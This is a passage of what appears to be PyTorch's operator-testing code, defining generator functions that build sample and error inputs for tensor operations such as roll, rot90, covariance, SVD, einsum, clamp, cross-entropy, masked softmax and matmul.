0), (-1, 0), (10000, 1), (2,), ((1, 2, -1), (0, 1, 2))) for arg in args: yield SampleInput(make_arg((0, 0, 0)), args=arg) yield SampleInput(make_arg((S, S, S)), args=arg) def error_inputs_roll(op_info, device, **kwargs): err_msg1 = "`shifts` required" s1 = SampleInput( make_tensor((S,), dtype=torch.float32, device=device), args=(tuple(),) ) yield ErrorInput(s1, error_regex=err_msg1) err_msg2 = ("shifts and dimensions must align") s2 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), args=((2, 1), 0) ) yield ErrorInput(s2, error_regex=err_msg2) err_msg3 = ("out of range") s3 = SampleInput( make_tensor((S, ), dtype=torch.float32, device=device), args=(0, 2) ) yield ErrorInput(s3, error_regex=err_msg3, error_type=IndexError) def sample_inputs_rot90(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) args = itertools.product(range(-5, 6), [(0, 1), (1, 2), (1, -1)]) yield SampleInput(make_arg((S, S, S))) for arg in args: yield SampleInput(make_arg((S, S, S)), args=arg) def error_inputs_rot90(op_info, device, **kwargs): err_msg1 = "expected total rotation dims" s1 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (0,)} ) yield ErrorInput(s1, error_regex=err_msg1) err_msg2 = "expected total dims >= 2" s2 = SampleInput( make_tensor((S,), dtype=torch.float32, device=device), ) yield ErrorInput(s2, error_regex=err_msg2) err_msg3 = "expected rotation dims to be different" s3 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (1, 1)} ) yield ErrorInput(s3, error_regex=err_msg3) def sample_inputs_std_var(op_info, device, dtype, requires_grad, **kwargs): tensor_nd = partial(make_tensor, (S, S, S), device=device, dtype=dtype, requires_grad=requires_grad) tensor_1d = partial(make_tensor, (S,), device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(tensor_nd()), SampleInput(tensor_nd(), kwargs=dict(dim=1)), SampleInput(tensor_nd(), kwargs=dict(dim=1, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=False, keepdim=False)), SampleInput(tensor_nd(), kwargs=dict(dim=(1,), correction=S // 2)), SampleInput(tensor_nd(), kwargs=dict(dim=None, correction=0, keepdim=True)), ] def _generate_correlation_inputs(device, dtype, requires_grad, **kwargs): shapes = [(2,), (1, 2), (3, 2), (2, 3)] for shape in shapes: yield make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) def sample_inputs_corrcoef(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(t) for t in _generate_correlation_inputs(device, dtype, requires_grad)] def sample_inputs_cov(op_info, device, dtype, requires_grad, **kwargs): inputs = [] for t in _generate_correlation_inputs(device, dtype, requires_grad): inputs.append(SampleInput(t)) num_observations = t.numel() if t.ndimension() < 2 else t.size(1) fweights = make_tensor((num_observations,), dtype=torch.int, device=device, low=1, high=10) aweights = make_tensor((num_observations,), dtype=torch.float, device=device, low=0, high=1, requires_grad=requires_grad) for correction, fw, aw in product(range(num_observations), [None, fweights], [None, aweights]): inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), kwargs={'correction': correction, 'fweights': fw, 'aweights': aw})) return inputs def error_inputs_cov(op_info, device, **kwargs): a = torch.rand(S, device=device) error_inputs = [] error_inputs.append(ErrorInput( SampleInput(torch.rand(S, S, S, device=device)), error_regex="expected input to have two or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, S, device=device)}), error_regex="expected fweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(S, S, device=device)}), error_regex="expected aweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, device=device)}), error_regex="expected fweights to have integral dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([1, 1], device=device)}), error_regex="expected aweights to have floating point dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([1], device=device)}), error_regex="expected fweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(1, device=device)}), error_regex="expected aweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([-1, -2, -3, -4 , -5], device=device)}), error_regex="fweights cannot be negative")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([-1., -2., -3., -4., -5.], device=device)}), error_regex="aweights cannot be negative")) return error_inputs def sample_inputs_svd(op_info, device, dtype, requires_grad=False, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) is_linalg_svd = (op_info.name == "linalg.svd") batches = [(), (0, ), (3, )] ns = [0, 3, 5] def uniformize(usv): S = usv[1] k = S.shape[-1] U = usv[0][..., :k] Vh = usv[2] if is_linalg_svd else usv[2].mH Vh = Vh[..., :k, :] return U, S, Vh def fn_U(usv): U, _, _ = uniformize(usv) return U.abs() def fn_S(usv): return uniformize(usv)[1] def fn_Vh(usv): # We also return S to test _, S, Vh = uniformize(usv) return S, Vh.abs() def fn_UVh(usv): U, S, Vh = uniformize(usv) return U @ Vh, S fns = (fn_U, fn_S, fn_Vh, fn_UVh) fullmat = 'full_matrices' if is_linalg_svd else 'some' for batch, n, k, fullmat_val, fn in product(batches, ns, ns, (True, False), fns): shape = batch + (n, k) yield SampleInput(make_arg(*shape), kwargs={fullmat: fullmat_val}, output_process_fn_grad=fn) def sample_inputs_permute(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = [((1, 2, 3, 4), (0, 2, 3, 1)), ((1, 2, 3, 4), (0, -2, -1, 1)), ((), ()), ((1, 2, 3, 4), (2, 1, 3, 0))] for shape, args in cases: yield SampleInput(make_arg(shape), args=(args,)) def reference_inputs_permute(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_permute(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((), ()), ((1,), (0,)), ((2, 2), (1, 0)), ((2, 2), (0, 1)), ((2, 0, 1), (0, 2, 1)), ((3, 4, 2), (2, 1, 0)), ((3, 4, 2), (1, 0, 2)), ((3, 4, 2), (0, 1, 2)), ) # Adds tricky permutations and permutations with noncontiguity for shape, permutation in cases: for p in itertools.permutations(permutation): a = make_arg(shape).permute(p) yield SampleInput(a, args=(permutation,)) a = make_arg(shape, noncontiguous=True).permute(p) yield SampleInput(a, args=(permutation,)) def sample_inputs_linalg_svdvals(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 2, 0] for batch, m, n in product(batches, ns, ns): yield SampleInput(make_arg(batch + (m, n))) def sample_inputs_softshrink_hardshrink_hardtanh(op_info, device, dtype, requires_grad=False, **kwargs): N = 10 tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype, requires_grad=requires_grad)) for _ in range(1, N)] return tensors def sample_inputs_eig(op_info, device, dtype, requires_grad=False, **kwargs): eigvecs = make_tensor((S, S), device=device, dtype=dtype, low=None, high=None) eigvals = make_tensor((S,), device=device, dtype=dtype, low=None, high=None) # we produce only diagonazible inputs which do not have # complex eigenvalues for real inputs, as there is no # backward implementation for real inputs with complex # eigenvalues yet. input = (eigvecs * eigvals.unsqueeze(-2)) @ eigvecs.inverse() input.requires_grad_(requires_grad) def process_output(eigpair): eigvals, eigvecs = eigpair if dtype.is_complex: # eig produces eigenvectors which are normalized to 1 norm. # Note that if v is an eigenvector, so is v * e^{i \phi}, # and |v| = |v * e^{i \phi}| = 1. # This, however, makes the eigenvector backward computation process # rather unstable unless the objective function is gauge-invariant, # that is if f(z) == f(|z|), for example. # Hence for complex inputs we ignore the phases and return only # the absolute values. return eigvals, eigvecs.abs() else: return eigvals, eigvecs return [ SampleInput( input, kwargs=dict(eigenvectors=True), output_process_fn_grad=process_output ), ] def sample_inputs_einsum(op_info, device, dtype, requires_grad=False, **kwargs): def c(t): return t.clone().requires_grad_(requires_grad) x = make_tensor((3,), dtype=dtype, device=device, requires_grad=requires_grad) y = make_tensor((4,), dtype=dtype, device=device, requires_grad=requires_grad) A = make_tensor((2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) B = make_tensor((1, 3,), dtype=dtype, device=device, requires_grad=requires_grad) C = make_tensor((1, 2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) D = make_tensor((1, 3, 4,), dtype=dtype, device=device, requires_grad=requires_grad) E = make_tensor((4, 4,), dtype=dtype, device=device, requires_grad=requires_grad) H = make_tensor((3, 3,), dtype=dtype, device=device, requires_grad=requires_grad) I = make_tensor((1, 3, 1,), dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] # Vector operations inputs.append(SampleInput([c(x)], args=('i->',))) # sum inputs.append(SampleInput([c(x), c(y)], args=('i,j->ij',))) # outer # Matrix operations inputs.append(SampleInput([c(A)], args=("ij->i",))) # col sum inputs.append(SampleInput([c(A), c(B)], args=("ij,kj->ik",))) # matmul inputs.append(SampleInput([c(A), c(E)], args=("ij,Ab->ijAb",))) # matrix outer product # Tensor operations inputs.append(SampleInput([c(C), c(D)], args=("aij,ajk->aik",))) # batch matmul inputs.append(SampleInput([c(D), c(E)], args=("aij,jk->aik",))) # tensor matrix contraction inputs.append(SampleInput([c(C), c(B)], args=("ijk,ik->j",))) # non contiguous # Test diagonals inputs.append(SampleInput([c(I)], args=('iji->j',))) # non-contiguous trace # Test ellipsis inputs.append(SampleInput([c(H)], args=("i...->...",))) inputs.append(SampleInput([c(C), c(x)], args=('...ik, ...j -> ij',))) return inputs def sample_inputs_linalg_qr_geqrf(op_info, device, dtype, requires_grad=False, **kwargs): # QR is just well defined when the matrix is full rank make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0,), (2, ), (1, 1)] ns = [5, 2, 0] for batch, (m, n) in product(batches, product(ns, ns)): shape = batch + (m, n) yield SampleInput(make_arg(*shape)) def sample_inputs_flip(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((S, M, S), (S, 0, M)) all_dims = ((0, 1, 2), (0,), (0, 2), (-1,), ()) for size, dims in product(sizes, all_dims): yield SampleInput(make_arg(size), kwargs={"dims": dims}) def sample_inputs_fliplr_flipud(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((S, 0, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def error_inputs_fliplr(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((1,), dtype=torch.float, device=device)), error_regex="Input must be >= 2-d.") def error_inputs_flipud(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((), dtype=torch.float, device=device)), error_regex="Input must be >= 1-d.") # TODO: clamp shares tensors among its sample inputs --- we should prohibit this! def sample_inputs_clamp(op_info, device, dtype, requires_grad, **kwargs): x = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) lb = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) ub = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) def detach(tensor): return tensor.clone().detach_().requires_grad_(requires_grad) return [ SampleInput(detach(x), args=(lb, ub)), SampleInput(detach(x), args=(detach(lb[0]), detach(ub[0]))), SampleInput(detach(x), args=(detach(lb[:, :1]),)), ] def reference_inputs_elementwise_ternary(op, device, dtype, requires_grad, *, sample_inputs_func, supports_scalars=False, **kwargs): yield from sample_inputs_func(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_scalar_tensor = partial(make_tensor, (), device='cpu', dtype=dtype, requires_grad=requires_grad) supported_dtypes = op.supported_dtypes(device) # broadcasting and oncontiguous cases cases = ( ((4, 4), (4, 4), (4, 4)), ((4, 4), (1, 4, 4), (4, 4)), ((4, 4), (1, 4, 4), (4, 1, 4)), ((4, 4, 1), (1, 4, 4), (4, 4)), ((4, 1), (1, 4, 4), (1, 4)), ((4, 4), (), (4, 4)), ((4, 4), (), ()), ((), (4, 4), (1, 4, 4)), ) for a, b, c in cases: yield SampleInput(make_arg(a), args=(make_arg(b), make_arg(c))) yield SampleInput(make_arg(a, noncontiguous=True), args=(make_arg(b).transpose(0, -1), make_arg(c, noncontiguous=True).transpose(0, -1))) # scalar cases if supports_scalars: cases = [ ((), 1, 2,), ((), 1., 2), ((4, 4), 1., 2,), ((3, 4), make_scalar_tensor(), make_scalar_tensor()), ] if torch.complex64 in supported_dtypes: cases.extend([ ((3, 1, 4), complex(1, 2), 3.), ]) for a, b, c in cases: yield SampleInput(make_arg(a), args=(b, c)) # type promotion cases # int x float if torch.float in supported_dtypes and torch.long in supported_dtypes: a = make_arg((), dtype=torch.long) b = make_arg((1, 4), dtype=torch.float) c = make_arg((3, 4)) cases = ( (a, b, c), (c, a, b), ) for a, b, c in cases: yield SampleInput(a, args=(b, c)) # NaN propagation if dtype.is_floating_point or dtype.is_complex: nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan')) a = make_arg((12,)) a[4] = nan a[7] = nan b = make_arg((12,)) b[1] = nan b[7] = nan c = make_arg((12,)) c[9] = nan yield SampleInput(a, args=(b, c)) def _clamp_numpy(a, min=None, max=None): if min is None: return np.minimum(a, max) if max is None: return np.maximum(a, min) return np.minimum(max, np.maximum(a, min)) def sample_inputs_clamp_scalar(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((2, 3, 2), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((2, 0, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) if dtype is torch.uint8: min_max_vals = ((2, 5), (3, 7)) else: min_max_vals = ((0, 1), (-1, 1)) output = [SampleInput( tensor.clone().requires_grad_(requires_grad), args=vals) for tensor, vals in product(tensors, min_max_vals)] output += [ SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(0.5, None)), SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(None, 0.5))] empty_tensor = make_tensor((), device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) output.append(SampleInput(empty_tensor, args=(0.0, 1.0))) return output def sample_kwargs_clamp_scalar(device, dtype, input): if dtype is torch.uint8: min_val, max_val = (random.randint(1, 3), random.randint(4, 8)) elif dtype.is_floating_point: min_val, max_val = (random.uniform(-8, 0), random.uniform(1, 8)) # type: ignore[assignment] else: min_val, max_val = (random.randint(-8, 0), random.randint(1, 8)) return {'min': min_val, 'max': max_val}, {'a_min': min_val, 'a_max': max_val} def sample_inputs_cross(op_info, device, dtype, requires_grad, **kwargs): sample0 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),)) sample1 = SampleInput(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': 1}) sample2 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': -1}) return (sample0, sample1, sample2) def sample_inputs_cumprod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_zeros(dim_select): assert len(dim_select) == 2 result = make_arg(3 * (S,)) result.narrow(dim_select[0], 0, 1).narrow(dim_select[1], 1, 1).zero_() result.narrow(dim_select[0], 2, 1).narrow(dim_select[1], 3, 1).zero_() result.narrow(dim_select[0], 4, 1).narrow(dim_select[1], 3, 1).zero_() return result for dim in range(3): yield SampleInput(make_arg((S, S, S)), args=(dim,)) # Scalar tensors and empty tensor for size in [(), (1,), (0,)]: yield SampleInput(make_arg(size), args=(0,)) yield SampleInput(prod_zeros([0, 1]), args=(1,)) yield SampleInput(prod_zeros([0, 2]), args=(1,)) yield SampleInput(prod_zeros([1, 2]), args=(1,)) # test dtype kwarg yield SampleInput(prod_zeros([1, 2]), args=(1,), kwargs={'dtype': dtype}) def sample_inputs_view_as_complex(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(make_tensor((S, 2), dtype=dtype, device=device, requires_grad=requires_grad),)] def sample_inputs_view_as_real(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def sample_inputs_prod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_single_zero(): result = make_arg(2 * (S,)) result[0, 1] = 0 return result for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): # only Tensor, ignore other inputs yield SampleInput(sample.input.clone().requires_grad_(requires_grad)) yield sample # Generates samples with keepdim = True for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): sample.kwargs['keepdim'] = True yield sample yield SampleInput(prod_single_zero()) yield SampleInput(make_arg((3, 3, 3)), args=(1,)) yield SampleInput(make_arg((3, 3, 3)), args=(1,), kwargs={'keepdim': True}) # test zero scalar tensor zero = make_arg(()) zero.zero_() yield SampleInput(zero.clone().requires_grad_(requires_grad)) yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,)) yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,), kwargs={'keepdim': True}) def error_inputs_neg(op_info, device, **kwargs): si = SampleInput(torch.tensor((False, True), device=device)) msg = ("Negation, the `\\-` operator, on a bool tensor is not supported." " If you are trying to invert a mask, use the `\\~` or" " `logical_not\\(\\)` operator instead.") return (ErrorInput(si, error_regex=msg),) def sample_inputs_diag(op_info, device, dtype, requires_grad, **kwargs): vec_sample = SampleInput(make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) tensors = ( make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((3, 5), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((5, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) args = ((), (2,), (-2,), (1,), (2,)) samples = [] for tensor, arg in product(tensors, args): samples.append(SampleInput(tensor.clone().requires_grad_(requires_grad), args=arg)) return samples + [vec_sample] def sample_inputs_diagonal_diag_embed(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # Shapes for 2D Tensors shapes_2d = ((M, M), (3, 5), (5, 3)) # Shapes for 3D Tensors shapes_3d = ((M, M, M),) kwargs_2d = (dict(), dict(offset=2), dict(offset=2), dict(offset=1)) kwargs_3d = (dict(offset=1, dim1=1, dim2=2), dict(offset=2, dim1=0, dim2=1), dict(offset=-2, dim1=0, dim2=1)) for shape, kwarg in chain(product(shapes_2d, kwargs_2d), product(shapes_3d, kwargs_3d)): yield SampleInput(make_arg(shape), kwargs=kwarg) def sample_inputs_diagonal_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # Shapes for 2D Tensors shapes_2d = ((M, M), (3, 5), (5, 3)) # Shapes for 3D Tensors shapes_3d = ((M, M, M),) args_2d = ((), (2,), (-2,), (1,)) args_3d = ((1, 1, 2), (2, 0, 1), (-2, 0, 1)) for input_shape, arg in chain(product(shapes_2d, args_2d), product(shapes_3d, args_3d)): input_ = make_arg(input_shape) # We can programatically figure out the right shape for src: # It should be the same size as input.diagonal(other_args...) if not isinstance(arg, tuple): arg_tuple = (arg,) else: arg_tuple = arg src_shape = input_.diagonal(*arg_tuple).size() src = make_arg(src_shape) yield SampleInput(input_, args=(src, *arg_tuple)) def sample_inputs_to_sparse(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((S, S)), args=(), output_process_fn_grad=lambda x: x.to_dense()), SampleInput(make_arg((S, S)), args=(1,), output_process_fn_grad=lambda x: x.to_dense()),) def sample_inputs_cross_entropy(op_info, device, dtype, requires_grad, **kwargs): batch_size, num_classes = shape = (2, 3) reductions = ("mean", "sum", "none") input_shape_and_kwargs: List[Tuple[Tuple[int, ...], Dict[str, Any]]] = [ (shape, dict()), ((*shape, 1), dict()), ((*shape, 1, 2), dict()), ((*shape, 1, 2, 3), dict()), *[(shape, dict(reduction=reduction)) for reduction in reductions], *[ ( shape, dict( weight=make_tensor((num_classes,), device=device, dtype=dtype), reduction=reduction, ), ) for reduction in reductions ], (shape, dict(ignore_index=1)), ] sample_inputs = [] for (input_shape, kwargs), probabilities_target in itertools.product(input_shape_and_kwargs, (False, True)): input = make_tensor(input_shape, device=device, dtype=dtype, requires_grad=requires_grad) if probabilities_target: # ignore_index is not supported for probabilities target if "ignore_index" in kwargs: continue target = make_tensor( input_shape, low=0, high=1, device=device, dtype=dtype, requires_grad=requires_grad, ) else: target = make_tensor( (batch_size, *input_shape[2:]), low=0, high=num_classes, device=device, dtype=torch.long, ) if "ignore_index" in kwargs and torch.all(target == kwargs["ignore_index"]): # make sure at least one item in target is not ignored target[0] = random.sample(set(range(num_classes)) - {kwargs["ignore_index"]}, 1)[0] sample_inputs.append(SampleInput(input, args=(target,), kwargs=kwargs)) return sample_inputs # Used for log_softmax, softmax, softmin def sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = [ ((S, ), (0, )), ((S, S), (0, )), ((S, S), (1, )), ((S, S), (-1, )), ((S, M, S), (2, )), ] # PyTorch on XLA throws an error when passed with dim argument for 0d tensor. # See https://github.com/pytorch/xla/issues/3061 for more details. if torch.device(device).type != 'xla': cases.append(((), (0, ))) return [ SampleInput(make_arg(shape), args=dim, kwargs=dict(dtype=torch.float64) if with_dtype else None) for shape, dim in cases ] def sample_inputs_masked_softmax(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): """Sample inputs for masked softmax, log_softmax, and softmin. Masked normalization operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. """ inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=with_dtype, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_cumops(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked cumsum and cumprod. """ inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): if type(mask) != torch.Tensor: continue sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) if 'keepdim' in sample_input_kwargs: sample_input_kwargs.pop('keepdim') # dimension is required if sample_input_args: dim = sample_input.args[0] else: if 'dim' not in sample_input_kwargs: continue dim = sample_input_kwargs.pop('dim') sample_input_args = (dim,) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_normalize(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked normalize. """ inputs: List[SampleInput] = [] for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_logit(op_info, device, dtype, requires_grad, **kwargs): low, high = op_info.domain # Note: Operator is very sensitive at points near the # start and end of domain and leads to NaN for float16 # if domain_eps is 1e-5. domain_eps = op_info._domain_eps if dtype != torch.float16 else 3e-2 low = low + domain_eps high = high - domain_eps samples = ( SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), ) return samples def sample_inputs_isin(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # isin has two paths based on the size of elements and test_elements. # if elements.numel() < 10 * pow(test_elements.numel(), 0.145): yield SampleInput(make_arg((L,)), args=(make_arg((S,)),)) # else: yield SampleInput(make_arg((S,)), args=(make_arg((L,)),)) def sample_inputs_masked_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(torch.randn((S,), device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(bernoulli_scalar().to(device), make_arg((S, S)))) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S))), broadcasts_input=True) def sample_inputs_masked_fill(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, 10)) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg(())), broadcasts_input=True) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, 10), broadcasts_input=True) def sample_inputs_masked_select(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn(M, M, device=device) > 0,)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M,), device=device) > 0,)), SampleInput(make_tensor((M,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((M, 1, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), ) return samples def sample_inputs_matrix_exp(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, requires_grad=requires_grad)), ) return samples def sample_inputs_matmul(op_info, device, dtype, requires_grad, **kwargs): test_cases = (((L,), (L,)), ((S, M), (M,)), ((M,), (M, S)), ((S, M), (M, S)), ((S, 0), (0, M)), ((S, S, M), (M,)), ((S, S, M), (M, S)), ((S, S, 0), (0, S)), ((M,), (S, M, S)), ((S, M), (S, M, S)), ((0, 0), (S, 0, 0)), ((S, S, M, M), (S, S, M, S)), ((S, S, M, M), (M,)), ((M,), (S, S, M, S))) sample_inputs = [] for lhs_shape, rhs_shape in test_cases: lhs = make_tensor(lhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) rhs = make_tensor(rhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if op_info.name == 'matmul': sample_inputs.append(SampleInput(lhs, args=(rhs,))) elif op_info.name == '__rmatmul__': sample_inputs.append(SampleInput(rhs, args=(lhs,))) else: raise RuntimeError("`op_info.name` must be 'matmul' or '__rmatmul__'") return tuple(sample_inputs) def sample_inputs_meshgrid(op_info: OpInfo, device: torch.device, dtype: torch.dtype, requires_grad: bool, *, variant: str, **kwargs) -> 